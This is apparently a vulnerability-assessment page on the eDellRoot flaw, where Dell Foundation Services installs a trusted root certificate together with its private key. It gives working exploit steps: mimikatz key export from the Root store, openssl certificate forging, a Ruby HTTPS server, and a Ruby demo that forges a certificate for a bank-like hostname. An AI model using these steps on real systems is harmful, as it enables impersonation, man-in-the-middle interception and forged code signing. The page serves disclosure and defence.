Attacker Value
Very High
(2 users assessed)
Exploitability
Moderate
(2 users assessed)
User Interaction
Unknown
Privileges Required
Unknown
Attack Vector
Unknown

Dell Foundation Services installs root certificate and private key (eDellRoot)

Last updated February 13, 2020

Description

Dell Foundation Services installs the eDellRoot certificate into the Trusted Root Certification Authorities store on Microsoft Windows systems. The certificate is installed together with its private key. Because the private key of a trusted root is available to anyone with access to the machine, attackers can issue certificates that the system trusts and use them for impersonation, man-in-the-middle (MitM), and passive decryption attacks, resulting in the exposure of sensitive information.


Technical Analysis

Details

How to exploit:

  • Export the DER CA certificate (through the Windows certificate manager, for example).
  • Convert the DER CA certificate to PEM:
openssl x509 -in der_edell_root.cer -inform der -outform pem -out edell_root.pem
  • Export the certificate private key, use mimikatz
crypto::certificates /systemstore:local_machine /store:Root /export

The certificate (again) and its private key will be in the directory where mimikatz lives. The private key is inside the .pfx.

  • Extract the key from the pfx and save as pem (password: mimikatz)
openssl pkcs12 -in local_machine_Root_3_eDellRoot.pfx -nocerts -out key.pem -nodes
  • Save a file named file.srl containing “6C” (the serial number for the certificate to be issued).

  • Create a server certificate request

openssl genrsa -out server.key 1024
openssl req -key server.key -new -out server.req

Use the CA certificate and its private key to generate the server certificate:

openssl x509 -req -in server.req -CA edell_root.pem -CAkey key.pem -CAserial file.srl -out server.pem

profit!

require 'webrick'
require 'webrick/https'
require 'openssl'

# Forged leaf certificate and its key, produced by the openssl steps above.
cert = OpenSSL::X509::Certificate.new(File.read('server.pem'))
pkey = OpenSSL::PKey::RSA.new(File.read('server.key'))

# HTTPS listener on port 8000 presenting the forged certificate. DocumentRoot is
# the current directory so that a test.html placed there is actually served.
server = WEBrick::HTTPServer.new(
  :Port => 8000,
  :DocumentRoot => Dir.pwd,
  :SSLEnable => true,
  :SSLCertificate => cert,
  :SSLPrivateKey => pkey
)
trap('INT') { server.shutdown }
server.start

Go to localhost:8000/test.html, you should see that eDellRoot has identified the site as localhost,
and that your connection is trusted.

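The procedure from the assessment above, carried end to end in Ruby as an added example (this is not code from the original assessment or from Dell). A constructed stand-in root CA named LeakedRoot plays the role of eDellRoot; its key "leaks" as a PKCS12 bundle protected with the password mimikatz, the way the mimikatz export does; a server certificate for the assumed hostname www.example-bank.test is minted with the leaked key (the equivalent of the genrsa / req / x509 -req steps, with serial 0x6C like file.srl); and an OpenSSL::X509::Store shows that a client trusting the root accepts the forgery while a client that has removed it rejects it. All names and hostnames are assumptions made for the example.

```ruby
require 'openssl'

# Constructed stand-in for eDellRoot: a self-signed CA whose private key is
# going to end up next to the certificate. Name and lifetime are made up.
def build_leaked_root
  key = OpenSSL::PKey::RSA.new(2048)
  cert = OpenSSL::X509::Certificate.new
  cert.version = 2
  cert.serial = 1
  cert.subject = OpenSSL::X509::Name.parse('/CN=LeakedRoot (stand-in for eDellRoot)')
  cert.issuer = cert.subject
  cert.public_key = key.public_key
  cert.not_before = Time.now - 60
  cert.not_after = Time.now + 10 * 365 * 24 * 3600
  ef = OpenSSL::X509::ExtensionFactory.new
  ef.subject_certificate = cert
  ef.issuer_certificate = cert
  cert.add_extension(ef.create_extension('basicConstraints', 'CA:TRUE', true))
  cert.add_extension(ef.create_extension('keyUsage', 'keyCertSign, cRLSign', true))
  cert.add_extension(ef.create_extension('subjectKeyIdentifier', 'hash'))
  cert.sign(key, OpenSSL::Digest::SHA256.new)
  [cert, key]
end

# Model of the mimikatz export: certificate and key travel together in a .pfx
# protected with the password "mimikatz". Returns what an attacker recovers.
def leak_as_pfx(cert, key)
  pfx = OpenSSL::PKCS12.create('mimikatz', 'LeakedRoot', key, cert)
  recovered = OpenSSL::PKCS12.new(pfx.to_der, 'mimikatz')
  [recovered.certificate, recovered.key]
end

# Equivalent of "openssl genrsa / req / x509 -req -CA ... -CAkey ...": mint a
# leaf for any hostname with the leaked CA key. Serial 0x6C mirrors file.srl.
def forge_server_cert(ca_cert, ca_key, hostname, serial: 0x6C)
  key = OpenSSL::PKey::RSA.new(2048)
  cert = OpenSSL::X509::Certificate.new
  cert.version = 2
  cert.serial = serial
  cert.subject = OpenSSL::X509::Name.parse("/CN=#{hostname}")
  cert.issuer = ca_cert.subject
  cert.public_key = key.public_key
  cert.not_before = Time.now - 60
  cert.not_after = Time.now + 365 * 24 * 3600
  ef = OpenSSL::X509::ExtensionFactory.new
  ef.subject_certificate = cert
  ef.issuer_certificate = ca_cert
  cert.add_extension(ef.create_extension('basicConstraints', 'CA:FALSE', true))
  cert.add_extension(ef.create_extension('keyUsage', 'digitalSignature, keyEncipherment', true))
  cert.add_extension(ef.create_extension('extendedKeyUsage', 'serverAuth'))
  cert.add_extension(ef.create_extension('subjectAltName', "DNS:#{hostname}"))
  cert.add_extension(ef.create_extension('authorityKeyIdentifier', 'keyid:always'))
  cert.sign(ca_key, OpenSSL::Digest::SHA256.new)
  [cert, key]
end

# What a TLS client does: build a chain to a trusted root, then match the name.
def client_accepts?(trusted_roots, leaf, hostname)
  store = OpenSSL::X509::Store.new
  trusted_roots.each { |c| store.add_cert(c) }
  store.verify(leaf) && OpenSSL::SSL.verify_certificate_identity(leaf, hostname)
end

# Assumed victim hostname; the forged leaf is checked against three clients.
def demo
  root_cert, root_key = build_leaked_root
  stolen_cert, stolen_key = leak_as_pfx(root_cert, root_key)
  leaf, _leaf_key = forge_server_cert(stolen_cert, stolen_key, 'www.example-bank.test')
  {
    issuer_matches:    leaf.issuer.to_s == root_cert.subject.to_s,
    trusted_with_root: client_accepts?([root_cert], leaf, 'www.example-bank.test'),
    wrong_host:        client_accepts?([root_cert], leaf, 'other.test'),
    after_removal:     client_accepts?([], leaf, 'www.example-bank.test')
  }
end

if $PROGRAM_NAME == __FILE__
  demo.each { |k, v| puts "#{k}: #{v}" }
end
```

The store check in client_accepts? is the same decision a browser or TLS library makes, which is why any hostname the attacker chooses validates as long as the root is trusted, and why deleting the root from the Trusted Root store (the after_removal case) is what closes the hole on a given machine.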
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Medium
Technical Analysis

It’s terrifying that this certificate supports all issuance and application policies. Reddit users have proven that this can be used to MitM HTTPS-encrypted web browsing, as well as to sign code. It’s unclear as to whether the certificate is unique to each install (which would turn this into maybe a local privesc), or whether the certificate is shared across all installs, at which point this becomes a threat to any Dell user on a compromised network.

It’s also worth pointing out that some users didn’t have the certificate described, but then had it added later after running updates. So sysadmins might have checked for this, but then had their workstations put into a vulnerable state afterwards.
